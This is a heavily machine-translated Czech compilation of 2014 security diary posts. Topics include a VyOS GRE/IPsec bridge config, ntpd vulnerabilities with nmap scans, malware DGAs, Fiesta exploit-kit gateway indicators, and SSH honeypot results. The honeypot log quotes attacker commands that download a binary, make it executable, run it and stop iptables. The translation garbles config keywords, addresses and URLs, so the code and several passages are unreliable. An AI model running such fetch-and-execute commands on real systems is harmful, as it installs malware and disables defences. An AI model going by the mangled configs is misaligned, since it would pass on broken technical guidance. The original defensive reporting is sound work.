Od té doby se věci změnily. Je tu skutečný tlak pohybovat DR stránek ze stojanu na vzdáleném místě kanceláře uznávaným IaaS cloudu umístění. S touto změnou přichází nové problémy. Pokud používáte své vlastní servery v kolokace zařízení, nebo pomocí IaaS instancí VM, stojan prostor pro fyzické router může být buď přijít s cenovkou, nebo jestli je to všechno virtuální, může docházet k racku místo vůbec.
V mém případě jsem měl dva klienty v této poloze. Prvním zákazníkem prostě chtěl přesunout své DR stránky z pobočky na kolokace zařízení. Druhý Zákazník je Backup-as-a-Service Provider Cloud Service, který vytváří "DR jako servisní" produkt. V prvním případě, nebyl žádný prostor rack být měl. V druhém případě, to poslední, co chce, je CSP muset vzdát fyzického místa v racku pro každého zákazníka, a pak nasadit CSP ve vlastnictví hardwaru na webu klienta - to prostě není měřítko. V obou případech, VM běžící instanci směrovače byl jednoznačně dává přednost (nebo pouze) volba.
Virtuální směrovače s podnikovými funkcemi byly po nějakou dobu - zpět v den, mohli jsme se podíval na Quagga či zebry, ale ty, které byly složeny do vyspělejších produktů v těchto dnech. V našem případě jsme se dívali na Vyatta (nyní ve vlastnictví společnosti Brocade), nebo open-source (zdarma jak u piva) vidlici Vyatta - Vyos (vyos.net). Cisco je také ve hře, jejich produkt 1000 podporuje IOS XE - jejich "most přes L2 L3" přístup používá OTV, spíše než L2TPv3 nebo GRE. Zjistíte, že většina směrovačů prodejci mají nyní virtuální produkt.
Každopádně, Práce s Vyatta / Vyos konfigurační soubory není jako Cisco vůbec - jejich configs vypadat mnohem více jako můžete vidět v Junos. Při Vyos podporuje L2TPv3 protokol, jak ji známe a lásku, to je zbrusu nová funkce, a je dodáván s poznámkou od developera "pokud najdete nějaké chyby, pošlete mi e-mail" (důvěru inspirující, že). Vyatta zatím nemá tato funkce implementována. Tak jsem se rozhodl použít GRE tunely a most je na ethernet rozhraní. Vzhledem k tomu, tunel se chystá spustit přes veřejný internet, šifrované I / zapouzdřený celou věc pomocí standardního site-to-site IPSec tunel. Konečné řešení vypadá takto:
Příslušné configs vypadat (pouze jeden konec je znázorněno), pod jedním Všimněte si, že to není celá konfigurace, a všechny IP adres byly zmenšován.
Prosím - použijte náš komentář formulář a dejte nám vědět, pokud jste použili jinou metodu přemostění Layer 2 po 3. vrstvě, a to, co úskalí, které by vás mohly museli překonat na cestě!
rozhraní {
bridge br0 {
stárnutí 300
ahoj-time 2
max-age 20
priorita 0
stp false
}
Za prvé, definovat rozhraní mostu. Ne, že STP (Spanning Tree Protocol) je zakázána. Ty pravděpodobně chtít tato volba zakázána, pokud máte paralelní druhý překlenul odkaz (možná tmavé vlákna nebo něco podobného)
ethernet eth0 {
bridge-group {
bridge br0
}
Popis BRIDGE
duplex auto
hw-id 00: 50: 56: b1: 3e: 4F
MTU 1390
smp_affinity auto
rychlost auto
}
Rozhraní eth0 je na serveru VLAN (nebo portu skupiny, pokud používáte standardní ESXi vSwitches.) - To je VLAN, že jste přemostění na DR webu je přidána k mostu, a nemá žádnou IP adresu.
ethernet eth1 {
adresa 192.168.123.21/24
duplex auto
hw-id 00: 50: 56: b1: 1d: A8
smp_affinity auto
rychlost auto
}
ETH1 je správa IP tohoto routeru, a je také terminátor pro tunel GRE a IPSec VPN.
Můžete rozdělit toto nahoru, mnozí by raději ukončit tunely do loopback například, nebo přidat další Ethernet, pokud dáváte přednost.
tunel tun0 {
Popis přemostěna
zapouzdření GRE-bridge
local-ip 192.168.123.21
multicast umožnit
parametry {
ip {
bridge-group {
bridge br0
}
tos dědí
}
}
remote-ip 192.168.249.251
}
}
GRE tunel je přemostěna, a také nemá IP adresu. zapouzdření GRE-mostu je stejný jako GRE (IP protokol 47), ale "GRE-bridge" zapouzdření umožňuje přidat toto rozhraní k mostu ,
.....
Systém věci, jako je AAA, NTP, časové pásmo, syslog, SSH, ACL a tak dále najdete zde
......
Tohle všechno je důležité pro vaši bezpečnost držení těla, ale není relevantní pro tunelování nebo přemostění, tak jsem redigován to.
vpn {
IPSec {
ESP-group PRL-ESP {
komprese disable
životnost 3600
Režim tunel
PFS zakázat
Návrh 1 {
šifrování AES256
hash SHA1
}
}
IKE-group PRL-IKE {
Životnost 28800
Návrh 1 {
šifrování AES256
hash SHA1
}
}
IPSec rozhraní {
rozhraní eth1
}
přihlášení {
log-režimy všechny
}
nat-traversal umožňují
site-to-site {
peer abcd {
ověřování {
idCUSTOMER
Režim předběžně sdílený tajný
pre-shared-tajný demo123
remote-idCLOUD
}
Připojení typu zahájit
default-esp-group PRL-ESP
IKE-group PRL-IKE
místní adresy 192.168.123.21
tunel 0 {
allow-nat-sítě zakázat
allow-veřejné sítě zakázat
ESP-group PRL-ESP
místní {
prefix 192.168.123.21/32
}
Protokol gre
dálkový {
prefix 192.168.249.251/32
}
}
}
}
}
}
Příslušné části v konfiguračním VPN jsou:
Všimněte si, že peer IP je veřejný / NAT'd IP na druhém konci
ID mají být vytvořen pro každý konec - tyto směrovače používají Xauth při definování předem sdílený klíč, tak aby se předešlo nutnosti je používat úplný název, je to bezpečnější definovat uživatelská jména
"Provoz match" pro šifrování je definován zdroj prefix + cílové prefix + protokol. V našem případě je to "řízení IP routeru zákazníka AND odpovídající IP na cloud routeru A GRE ".
NAT-T je povoleno, protože oba konce jsou za NAT firewall
. Udělejte si pozor při definování předem sdílený klíč Dojde-li slovo na firemní webové stránky, stránku na Facebooku, nebo LinkedIn (nebo ve slovníku), je to špatná volba, Leet-mluvit, nebo ne. Podívejte se na https: // ISC .sans.edu / fórum / diář / 16643
· Stanovili jsme oba konce "iniciovat", která umožňuje jak init i odpovědět. To umožňuje buď konec spustit tunel
===============
Kritický #NTP Chyba ntpd před 4.2.8
28.12.2014 Zranitelnosti
Bezpečnostní tým Google objevil několik chyb v běžných implementacích NTP, z nichž jedna může vést ke spuštění kódu [1] [2]. NTP servery předchozí verze 4.2.8 jsou ovlivněny.
Tam jsou některé zvěsti o aktivní využití alespoň některé z těchto zranitelností objevených Google.
Ujistěte se, že na opravu všechny veřejně dostupné implementace NTP tak rychle, jak je to možné.
Polehčující okolnosti:
Zkuste blokovat příchozí připojení NTP serverům, které nemají být veřejně dostupné. Je však třeba si uvědomit, že jednoduché Statefull firewally nemusí sledovat UDP spojení správně a umožní přístup k interním serverům NTP z libovolného externího šetření, pokud je server NTP nedávno založila odchozí spojení.
ntpd obvykle nemusí běžet jako root. Většina verzí Unix / Linux se bude konfigurovat NTP používat nižší privilegovaných uživatelů.
Podle poradenství v ntp.org, můžete si také:
Zakázat autokey ověřování tím, že odstraní, nebo komentáře, veškeré konfigurační direktivy začínající kryptografické klíčové slovo v ntp.conf souboru.
Několik Ubuntu a CentOS systémy jsem testoval, stejně jako OS X systémy, nezdá se, že používat autokey.
[1] http://www.kb.cert.org/vuls/id/852879
[2] http://support.ntp.org/bin/view/Main/SecurityNotice
CVE Náraz Podrobnosti
CVE-2014-9293 ověření pravosti NTP vytvoří slabý klíč, pokud nikdo je k dispozici v konfiguračním souboru.
CVE-2014-9294 ověření pravosti NTP-keygen používá slabý semeno k vytvoření náhodných klíčů
CVE-2014-9295 vzdálené spuštění kódu Vzdálený útočník může poslat pečlivě budovaný paket, který může přetečení zásobníku vyrovnávací paměti a potenciálně umožnit škodlivý kód, který má být proveden s úrovní oprávnění v ntpd procesu.
CVE-2014-9296 chybí chybová zpráva V kódu NTP, část kódu chybí návrat, a výsledná chyba označuje zpracování nezastavil.
Jaké NTP servery potřebujete opravit?
28.12.2014 Zranitelnosti
( Podívejte se také na dřívější deník o této chybě )
Zatímco lidé obecně vědí, kde jejich "skutečné" servery NTP jsou všichni často nevědí, že mám vor "náhodných" NTP serveru - boxy, které mají NTP povoleno bez systémových správců o tom věděli. Společné serverů v síti, jako směrovače nebo přepínače (často, když se jedná o klienty NTP, ale jsou také servery NTP), PBX a VoIP brány, poštovní servery, certifikačních autorit, a tak dále.
V těchto dnech automatické aktualizace, by si myslíte, že většina serverů NTP by být oprava proti zranitelností nalezených tým Google a popsané v příběhu napsána Johannes dnes večer.
Nicméně to trvalo jen do druhé hostitel zkontrolovat zjistit velmi zastaralé serveru. Bohužel, to je hlavní NTP server velkého kanadského ISP (Jejda). To, co jsem také našel po cestě bylo, že mnoho serverů hlásí "4", jako verze, a to z -sV spínače, ne z NTP-info. Takže v závislosti na vašich interních serverů a jak jsou nastaveny, může to být čas, abychom začali používat ověřená skenování pomocí nástrojů jako je Nessus získat verze služby pro naše servery NTP. Doufejme, že je to praxe pro ostatní služby již.
Všimněte si, že IP adresy v těchto skenů jsou popletl
C: \> nmap -Su -pU: 123 -sV ntp.someisp.ca --script = NTP info.nse
Spuštění Nmap 6.47 (http://nmap.org) v 2014-12-19 21:44 východního standardního času
Nmap skenování zpráva za ntp.someisp.ca (xxxx)
Hostitel je nahoru (0.0045s latence).
rDNS záznam pro xxxx: khronos.tor.someisp.ca
PORT STATE SERVICE VERZE
123 / udp open NTP NTP v4
| NTP-info:
| přijímat časové razítko: 2014-12-20T02: 47: 52
| verze: ntpd 4.1.1c-rc1@1.836 Thu 13.února 12:17:19 EST 2003 (1)
| Procesor: i686
| Systém: Linux2.4.20-8smp
| skok: 0
| stratum: 3
| přesnost: -17
| rootdelay: 11,079
| rootdispersion: 33,570
| peer: 32471
| refid: xxxx
| reftime: 0xd83f5fad.b46b9c30
| hlasování: 10
| hodiny: 0xd83f61d5.3a71ef30
| state: 4
| offset : -0,329
| kmitočet: 46,365
| jitter: 3,468
| _ stabilita: 0.004
Detekce prováděné služby. Nahlaste nám prosím jakékoliv nesprávné výsledky na adrese http: //. Nmap
org / odeslat /.
Nmap udělat: 1 IP adresa (1 hostitel nahoru) naskenovány 180,08sekunda
Tento server na druhé straně, nehlásí verzi v NTP-info výstup. "-sV" Hlásí verze 4, ale to je všechno, co jsme si.
C: \> nmap -Su -pU: 123 -sV time.someotherserver.com --script = NTP info.nse
Spuštění Nmap 6.47 (http://nmap.org) v 2014-12-19 22:17 východního standardního času
Nmap skenování zpráva za time.someotherserver.com (rr)
hostitel je nahoru (0.010s latence).
PORT STATE SERVICE VERZE
123 / udp open NTP NTP v4
| NTP-info:
| _ dostávat časové razítko: 2014-12-20T03: 19 : 39
Detekce prováděné služby. Nahlaste nám prosím jakékoliv nesprávné výsledky na adrese http: //. Nmap
org / odeslat /.
Nmap udělat: 1 IP adresa (1 hostitel nahoru) naskenovány 143,24sekunda
Ale opravdu, po tomto roce vulnerabilties, které jsme viděli v základních systémových služeb, je na čase, aby lidé vzal "SANS Top 20" na srdce - rozhodující Controls SANS, že byste opravdu měli být při pohledu na, pokud je to váš cíl zajistit síť - https://www.sans.org/critical-security-controls. Top 5 v seznamu shrnout první linii obrany proti věci, jako je tento. Víte, co je na vaší síti, vědět, co se běží na to, že mají formální program oprav a aktualizací, a pravidelně vyhledává nové hostitele, nových služeb a nových zranitelností. Pokud je to vaše myšlenka, že jediný skenování pro tuto jednu chybu zabezpečení, je nejdůležitější věc na vašem talíři (nebo skenování pro heartbleed nebo Shellshock byl na začátku tohoto roku), pak jste již ztratil - to je čas, aby přezkoumala kritické prvky SANS a předělat svůj IT a bezpečnostních operací.
Quick Dodatek / Update (Johannes):
CentOS a dalších distribucích Linuxu dělali vydání aktualizace. Nicméně, může řetězec verze nezmění. Podívejte se na "Datum sestavení". Například na CentOS 6:
Před patche: ntpd 4.2.6p5@1.2349-o Sat 23.listopadu 18:21:48 UTC 2013 (1)
Po opravě: ntpd 4.2.6p5@1.2349-o Sat 20.prosince 02:53:39 UTC 2014 (1)
Severní Korea Internet Down
28.12.2014 Incidenty
Jordan a jiní psali asi Severní Korea jsou offline. Arbor má velkou místo s nějakou analýzou ( http://www.arbornetworks.com/asert/2014/12/north-korea-goes-offline/ ). V souladu s článkem, netblock který je targted je 175.45.176.0 - 175.45.179.255. Další podrobnosti na odkaz výše.
Co si myslíte, že bude nejvyšší Cybersecurity příběh od roku 2015?
28.12.2014 Incidenty
Byl jsem požádán o reportér před pár dny, co jsem si myslel, že horní Cybersecurity příběh 2015 bude. 2014 viděl nějaké velké příběhy, Target (a nesčetné množství porušení POS), Heartbleed / Shellshock / kol, Sony ...
Bude to rok lidé konečně brát vážně kybernetické bezpečnosti, nebo zvítězí status quo? Nechte své myšlenky v sekci komentář níže a bude následovat příští týden.
Jak jsem se naučil nedělat si starosti a milovat malwaru DGAS ....
28.12.2014 Viry
Růst malware rodin s využitím algoritmů pro generování domén v roce 2014, byl poněkud značný. Například, P2P GameOver Zeus, Post-Tovar Zeus a Cryptolocker všechny použité DGAS. Předpokládá se, že kód generuje domény (obvykle, ale ne vždy), tím, že data a běží to hodit nějaký magický matematiku přijít se seznamem mnoha oblastech za den. To umožňuje útočníkovi, aby se zabránilo statické seznamy domén pro zpětná volání v jejich kódu, a umožnit jim větší pružnost, aby se takedowns trochu obtížnější. Místo toho, jak se jedné domény podezřelé, nyní se musíte dostat tisíce pozastaven. A pokud si myslíte, že "dobré lidi", jsou na vás, můžete změnit šifrování semeno a získat nový seznam domén.
To znamená, že je to také dvousečný meč. Pokud se můžete dostat algoritmus, můžete proaktivně blokovat celou rodinu v jednom faul pera. Vezměte si například, hesperbot. Garage4Hackers má pěkný zápis se na tom, jak zpětně analyzovat DGA a poskytují užitečný skript na konci.
Tento konkrétní DGA negeneruje tolik domén, ale poskytuje dobrý příklad. Od samého počátku, můžete jednoduše vypsat seznam domén do RPZ či další DNS blokování technologie. To je hezké, ale co když jste chtěli udělat nějaké hrozbách Ninjitsu místo toho?
Můžete si vzít ten seznam domén, pokusí se je vyřešit a pak vypsat aktivní IP adresy a domény do krmiva. Nyní máte data, která se může otáčet pryč, hodit do CIF , nebo dát k dispozici jako OSINT dostat Šílená láska od svých vrstevníků.
V současné době lze sledovat 11 rodin tímto způsobem a procesní asi 200.000 domén, každých 10 minut, aby vytvářet kanály (můj Novoroční cílem je zvýšení této desetinásobně). To přináší zajímavý škálovatelnost problém popředí ... jak vyhledávání, že mnoho počítačů paralelně místo seriálu. V případě, že používám dva příkazy Linux: paralelní (self-vysvětlující) a ADNS-tools. ADNS-tools je sada, která umožňuje asynchronní vyhledávání DNS v mnoha hostitelů. Tak dlouho, jak budete mít přátelské DNS resolver nevadí vaše naprostou kompletní útok jeho cítění, máte dobré jít.
Tím umožňuje vzory objevovat docela rychle ... obvykle je to stejné IP adresy se podílejí, obvykle mají vyhrazenou doménu, která dělá autoritativní DNS pro všechny DGA-zovaný domén, a vy můžete posoudit, jaké národnosti jsou herci jsou tím, co svátky berou v registraci domén. :)
Vše za cenu učit trochu krajty, můžete si nastavit homebrew malware systému dohledu.
Grown Up Security vánoční seznam
28.12.2014 Bezpečnost
Moje žena je vánoční hudební narkoman. Počínaje hned po Remembrance Day každý okamžik v našem domě nebo v autě je plná zvuků vánoční hudby, a to buď z vlastního kolekce iTunes (v současné době 623 písní a rostoucí ročně), nebo streamované z internetu nebo satelitního rádia. Každý rok se zdá, že jedna píseň, která se stane, že ušní červ a drží se mnou po celou vánoční sezónu. Před několika lety to bylo " Oh Holy Night ", další, že je" já chci hrocha na Vánoce ", letos objevil jsem nový, alespoň pro mě. " Můj Grown Up Christmas seznam ". Píseň byla napsána kanadským David Foster a jeho tehdejší manželka Linda Thompson-Jenner. To bylo původně zaznamenaný David Foster s vokály od Natalie Cole, v roce 1990, ale pravděpodobně nejslavnější verze byla zaznamenána od Amy Grant v roce 1992, i když to bylo od té doby se vztahuje mnohokrát. Jist písně je, že bychom se ptát Santa Claus Další věci na Vánoce, ale že bychom náš seznam Vánoce se měli zeptat na řešení společnosti a světové problémy. Rozhodně dobrý sentiment v těchto nejistých časech.
Dnes jsem se přemýšlet ... v případě, že ISC měla mít Grown Up seznam Security vánoční, co by se na to?
Prosím, pošlete své nápady prostřednictvím fóra připomínky, nebo prostřednictvím naší kontaktní stránky .
- Rick Wanner - rwanner na ISC tečka sans dot edu - http://namedeplume.blogspot.com/ - Twitter: namedeplume (Protected)
Incident Response na Sony
28.12.2014 Incidenty
Pro ty z vás, kteří si nejsou vědomi; Sony má v současné době vysílání práce pro ředitele Incident Response . Tam, odkud pocházím, které odkazují k tomu, jak "zavření dveří stodoly poté, co kůň dostal ven," Je to třeba někde začít, a koneckonců to zní jako chladné práce pro zkušeného Incident Handler. Dělají zmínit certifikace SANS. Samozřejmě, že ano dát SANS certifikace na stejné úrovni jako CISSP a CISM, ale je to krok.
Moje rada pro nové IR manažer Sony je vrátit a revize a aktualizace, jejich plány reakce na incidenty, protože odezva Sony na tento incident byl fraškovitého v nejlepším případě. Matthew Schwartz na InfoRiskToday zveřejnil příspěvek popisující "Sony 7 Porušení Chyby odpovědí ". Chcete-li zobrazit podrobnosti naleznete znovu a četl jeho článek, ale shrnout, říká, že je 7 chyby byly:
Neschopnost rozpoznat, že toto porušení
Špatná porušení odpověď
Střelba posla
V rozporu se
Postoupení rizika kontrolu nad rozhovoru
Neschopnost přijmout odpovědnost
Hromadí staré e-maily
Ti z vás, kteří jsou studenty metodiky SANS Incident Response bude vědom toho, že metodika využívá plicní na PICERL; Příprava, identifikace, Zadržování, vymýcení, obnovy a poučení. Za předpokladu, že Sony měl IR plán, a po ní, srovnání tuto metodiku pro Sony "chyb", to mě napadlo, že většina poruch Sony důsledkem nedostatečného času stráveného v přípravě.
Většina lidí si myslí, přípravku jako ujistit, že máte správné preventivní a detektivní kontroly na místě, aby se zabránilo doufejme, a pokud ne, zjistit porušení. Příprava však musí zahrnovat mnoho dalších aspektů, včetně, rámce incident managementu, strategie reakce, a komunikačního plánu.
Rámec správy incidentů určuje každý aspekt svého týmu reakce na incidenty, z který jsou účastníci toho, kdo má na starosti s tím, jak komunikace tým bude fungovat. Ve většině společností IR se stala funkce technického IT. Zatímco má správné technické prostředky reagovat na události, je důležité, mít správnou strukturu řízení na místě, aby účinně řídit incident je stejně důležité. Nezapomeňte zahrnují právní a komunikační funkce v týmu reakce na incidenty. Budou nezbytné ve veřejném porušení.
Strategie reakce zahrnuje procesy a postupy, které budou použity v případě mimořádné události. Jeden skvělý způsob, jak rozvíjet tyto procesy a postupy, je spustit stolních cvičení a falešné incidentů cvičení s týmem IR. Výstup z těchto cvičení by mělo být mírně podrobné plány, jak zvládnout tyto incidenty. Předvídáním běžné scénáře předem incidentu vede ke skutečné reakce na mimořádné události je hladší a méně stresující, když ve skutečnosti dojde k incidentu. Není možné předvídat všechny myslitelné událost, ale myslet na postupů a procedur, jako stavební bloky, které mohou být znovu použity a modifikované v případě skutečného incidentu.
Důležitou součástí jakékoli veřejné události je efektivní komunikace s tiskem a vaše externí zainteresované strany, jako jsou zákazníkům a akcionářům. Důležitou součástí tohoto bude, aby si své právní a komunikační lidí na stejné stránce jako svého zástupce. Čas, aby se přijít na to, co vám bude a nebude veřejně uvolnění není v žáru incidentu. Podle mých zkušeností to obvykle vede k ochrnutí a nakonec vypadá, že máte něco skrývat, nebo se snaží uvést v omyl. Hodně stejný jako strategie incidentů, komunikační plán je nejlépe divised předem v rámci modelových incidentů a stolním cvičení. Podle mého názoru komunikuje pravdu, brzy a často, je nejlepší přístup. Komunikační funkce byla, kde Sony spadl nejhorší, jak s interní i externí komunikaci.
S ohledem na tuto skutečnost se zdá jako dobrý čas pro všechny z nás, aby si naše IR plány ve světle některých vysokých porušení profilu v letošním roce.
Brána do Fiesta využívat soupravy v 94.242.216.69
28.12.2014 Viry
Toto je hostem deník předložil Brad Duncan.
Za poslední rok nebo tak, jsem si všiml určité skupiny pomocí bránu, který přesměruje na využití kitu (EK), obvykle Fiesta. Tato brána se vyvinul v průběhu minulého roku, změna IP adresy, názvy domén, a vzory adres URL. V současné době je tato brána je použití 94.242.216.69 jako jeho IP adresu.
Nakažený jsem VM na 2014-12-24 pomocí původní referer z příkladu jsem našel po vyhledání 94.242.216.69 webový provoz protokoly mého organizace. Obrázek níže ukazuje bránu na 94.242.216.69 a Fiesta EK na 205.234.186.111..png)
Nahoře: Wireshark displej pro infekci Fiesta EK pomocí této brány.
Sledování infekce provoz s bezpečnostní cibule ukazuje příslušné podpisy Snort pro Fiesta EK:
Nahoře Snort událostí z bezpečnostní cibulkou pomocí ET otevřít sadu signatur.
Podívejme se, jak se brána ukazuje na Fiesta EK. Začátkem tohoto roku, brána používá poměrně jednoduché iframe. Zde je příklad od dubna 2014:
Nahoře: Brána do Fiesta EK od dubna 2014.
Současná brána má mnohem delší javascript, a URL pro Fiesta EK je mírně popletl. Zde je příklad z 2014-12-24:
Hledat provozu na protokoly web pro 94.242.216.69, a budete pravděpodobně najít několik různých názvů domén pomocí zvláštní vzor pro brány. Zde je ukázka toho, co jsem našel na 94.242.216.69 od 12.10.2014 do 2014-12-23:
alpinias.com - GET /?_SPMq=vahK1gfvq3&z1_Aj=fW8sL8ld&nkPgy=81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf=fu5dv5&wDK9=Ydqk
1z4o6&52YRK=eHl9jdJ8j&I86__=He0S4m9G&QPy3i=J4HP58S7h&dRPS8=7bi7Y
astroysch.com - GET /?LDZhT=Kegl8uezbqbx6n&_Nk98=Pa59bTd3&_Jp3B=k9hKcTeG_eS30&mwpoA=k3OmaPs700bK&E03
=6800L6Kf&_S_Z2l=z1Hge2_s2R0M0M
avtrokosmo.com? - GET / eg4yxQ = 49eU6k7bIc a PB5 = ei8YapbIdQubUz3 a qMUy = w8H4iaz2
Q1sePdZ a V4Zg = 1hcfLh96u07x
bendjoblac.com? - GET / L_T = XfmqeN3LeQ97Wbwa7G6U a OJgt = M1q6pbX2Xe_I8eK2n7a a Usdm_v = MerQ5S5q6R9taM0IaIyfL3 a HSLF = 5c
enotikkiki.com - GET /?tBbJ=286uU9r&tikG=zaoY7Q_0KT8&F0BREM=_4S3n0w9&a2NE=9_d2Kz6&ptmh=f87qma&aOc=2UQ
5L1U1g&WEfu6e=kcn_61M1s&rqR=R2s_9S9dG&Mvn=7b
kattyjerem.com? - GET / jtDO_ = 6pcoex6X_9I1TK9qJckr1Go9t3UL0sdQ_5L a ČSM = W3WO4NcvQ4M2tifG8ll9GXdxcgG0Q8Iz8Zn7M
hillarysday.com? - GET / m9SO_ = y2Nbh6pd_0j9Mw8 a 4xF = 6h1WubuKajeV4Ke a bW6dQc =
w6UcT2aK1f2T a mj7 = b_0u9j7Za_aV0 a vUhf = ma
magggnitia.com - GET /?3W_wN=I40_W5_&eht=t8vP8M8L&2ad_uO=33KPa&_s3oi=8P5_7&QLfo=cHai8w&ZM7P_K=bSG7TH3p
&UKb38=1s4wx2s&jSJyB=cM7c
magicalcepp.com? - GET / SK9 = 7ufJ8Ky7H8nS34n7f1h8t887R49 a Evropského rozvojového fondu = 1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR
magnitigus.com? - GET / V7k2sF = sbLLbi2fp9p073kddzfGanaT5K1cGqd a UQG = tc8Z8G0kav2v7QY5gf3I2Z8y5_V0v3dJ0P
margartata.com - GET /?Cid=nak4G9z&UkE3K=3i6iq9&dUjM6_=Xe0se&J_X_g=R4taa&Jr4YHO=q9HQ34P&x1_=3gaZ4H&DVhN=
v4v32&6t_=bu_1OX3O&kFP=7y_5rv7
martinegris.com - GET /?m_FxE=eh0&MkFq=H8GeS&fz7=1l3&d2T6r=ae&LeH_9=k0Il2W&Z7i6=3S1&7h_=Sdlc&zmGAU=i0uf&
mMwf=ehp5p&ymV7T=y7lKe&Jpk_DF=_5_2
muertiose.com? - GET / _ I4XS = idKbueq4kR1q8 a 0TsZ = Y0Wn7Lbr6K9hch a thXvW = 56WPa
qG2OdJ0 a Ff_lty = x21dbrs8y5
throneonetwo.com? - GET / rQRqX = aj2us3_9Z4 a dBzt = h4uKf3l7eV a SIDj = 5rd_7zcN0g a
2Btxc = aief3k7 a OGC = X6g62bgw9h a NUZHg = _5Q4scVc
treestois.com? - GET / Zd_E = Zd_0Q9_5SZbUU32Z4m4bOchhflz2g5n1h7_b6Xgct a sIVh = M8gcrO2yw78886tz8Zf6Ycba_cRd0o1Vk1
velasvegas.com? - GET / e2_Iq = 652WNc a zup = V1Z7I2wR9m a 5_zQ = k3YT7O4H3_ a Dy
2bH = t9nsbcbm a Gm2J_ = 1Kf_Ib0 a gq_BF = 98m6
Všechny výše uvedené domény jsou registrovány na stejné organizaci:
Žadatel o registraci název / organizace: Wuxi Yilian LLC
Žadatel země: Čína
Kanceláře: www.bizcn.com
alpinias.com - Registrovaný: 2014-08-29
astroysch.com - Registrovaný: 2014-10-27
avtrokosmo.com - Registrovaný: 12.01.2014
bendjoblac.com - Registrovaný: 11.12.2014
enotikkiki.com - Registrovaný: 2014-10-21
kattyjerem.com - Registrovaný: 11.12.2014
hillarysday.com - Registrovaný: 2014-09-18
magggnitia.com - Registrovaný: 12.01.2014
magicalcepp.com - Registrovaný: 2014-09-18
magnitigus.com - Registrovaný: 12.01.2014
margartata.com - Registrovaný: 12.01.2014
martinegris.com - Registrovaný: 2014-10-21
muertiose.com - Registrovaný: 10.03.2014
throneonetwo.com - Registrovaný: 2014-10-27
treestois.com - Registrovaný: 12.01.2014
velasvegas.com - Registrovaný: 11.12.2014
Každá z domén na 94.242.216.69 je vázána na konkrétní ohrožení webové stránky. Pokud máte přístup na webový provoz a HTTP hlaviček, je snadné najít kompromisní webové stránky. Stačí se podívat na odkazové v žádosti o HTTP GET na 94.242.216.69.
Skupina, za těchto oblastech se používá alespoň 4 různých IP adres v průběhu minulého roku. To bude pravděpodobně zase změní. Wuxi Yilian LLC je žadatel o registraci pro všechny domény jsem našel pro toto přesměrování v roce 2014.
Těším se na setkání, co tato skupina dělá v roce 2015.
----------
Brad Duncan je analytik v Rackspace Security, a on provozuje blog na malware Traffic Analysis na http://www.malware-traffic-analysis.net
Honey Pot Entertainment - SSH
28.12.2014 Hrozby
Vánoční období je příjemný čas hrát s některými lákadla a sdílet některé z informací, které byly sbírání. V současné době mám jen dvě funkce, a to jak z nich se nachází v USA. Každý dostane 20K nebo více pokusů o přihlášení za den. Jsem pomocí instalace standardní Kippo, běží jako non uživatel root a použití authbind spustit HoneyPot na portu 22. Výsledky jsou odesílány na protokolování serveru pro sběr.
Jeden z honeypots nemá platné heslo, takže je vždy selže, že jsem hlavně zájem o sbírání různé ID uživatele a hesla používá v pokusech tipovací. Druhý člověk má platné heslo a já pravidelně rozšiřovat své působení tím, že správné odpovědi využívající možnosti Kippo. Heslo lze změnit úpravou data / userdb.txt souboru v Kippo podadresáři. Interakce může být zlepšena tím, vydáním příkazu a zachycovat výstup a umístěním výsledný soubor v txtcmds adresáři. Například sftp je často první příkaz vydán. Vyhledejte kde je sftp běží od (obvykle / usr / bin). Vytvoření struktury pod honeyfs adresáři, např honeyfs / usr / bin / sftp . Vydat příkaz SFTP a zachytit výstup do souboru s názvem sftp a umístěte jej do txtcmds adresáři, stejnou strukturu tak txtcmds / usr / bin / SFTP . Nyní, když je zadán příkaz, že dostane odpověď, a doufejme, že budete mít další výsledky.
Takže některé statistiky za prosinec:
Unikátní Hesla použít: 136029
Unikátní userids použít: 305
Unikátní Atatcking IP adresy: 343
Nejběžnější hádal heslo Nejčastější se jménem uživatele
admin 1528 kořen 612564
123456 671 admin 13615
12344321 438 ubuntu 127
standardní 434 věštec 51
a1s2d3f4 433 test 41
kořen 430 ftpuser 31
q1w2e3 426 uživatel 29
qwer1234 422 podpora 28
111111 420 UBNT 26
1q2w3e4r5t 417 host 23
Místa
Nejšpinavější podsítí
Níže jsou uvedeny / 24 podsítí, které jsou nejaktivnější s vysokým počtem počítačů ze stejné podsítě útočí.
103.41.124.0 - HK, CN - AS 63854
AS 4134 - https://isc.sans.edu/asreport.html?as=4134
122.225.109.0 - Huzhou, CN
122.225.97.0 - Huzhou , CN
122.225.103.0 - Huzhou , CN
218.2.0.0 - Nanjing, CN
222.186.34.0 - Nanjing , CN
61.174.50 - Huzhou , CN
61.175.51 - Huzhou , CN
Na základě výše uvedených skutečností, že jsem docela dobře v tom, že blokování cokoli, co vzejde z AS4134 by nebyl špatný nápad.
Hesla
Hesla použité v pokusech je velmi pestrá a sahají od jednoduché, jak je uvedeno výše, mnohem více esoterických a složitá hesla, jako je !! QAZ@@WSX ## EDC, !! Er.HAA22a098yIGH @ _Z @, % TGBVFR $ # EDCXSW @, WORLDEDU20121123.
Příkazy Vydáno
ls - la / var / run / SFTP . PID
# ! / bin / sh PATH = $ PATH : / usr / local / sbin : / usr / local / bin : / usr / sbin : / usr / bin : / sbin : / bin
wget http : / / --- --- odstřihnout / nainstalovat / 8004
chmod + x 8004
. / 8004
uname
servisní iptables zastavit
Došlo k určitému nárůstu snímání za poslední měsíc nebo tak nějak. Můj předchozí Honeypot run v srpnu 2014 by max při 1500 pokusů za den. Hlavním překvapením pro mě bylo, široká škála hesel používá. Řada z nich se zdá, že se přímo vztahují na konkrétní typy hardwaru nainstalovaného, jako je modem / router. Jiní vypadají jako docela robustní hesla a může pocházet z různých hesel kompromisů v letošním roce. Hlavním poselstvím je, že pokud používáte SSH server, že dostane napadl a vy byste možná nějaké slušné hesla a v ideálním případě použití ověřování certifikátů k zabezpečení serveru.
Chcete-li spustit svůj vlastní, já jsem fanoušek Kippo, to je jednoduché nastavení a existuje spousta příruček o tom, jak to udělat. Ujistěte se, že jste to běží na pole, které není výrobní zařízení a zajistěte jej. Nechcete, aby se stal představovat bod pro útoky.
Chcete-li, aby předložily své Kippo klády, Dr. J v tomto deníku https://isc.sans.edu/diary/New+Feature+Live+SSH+Brute+Force+Logs+and+New+Kippo+Client/18433 poskytuje perl, aby tak učinily.
Miliónový byznys posunuli vyděrači o úroveň výš. Vydělávají na důvěřivcích
26.12.2014 Hacking
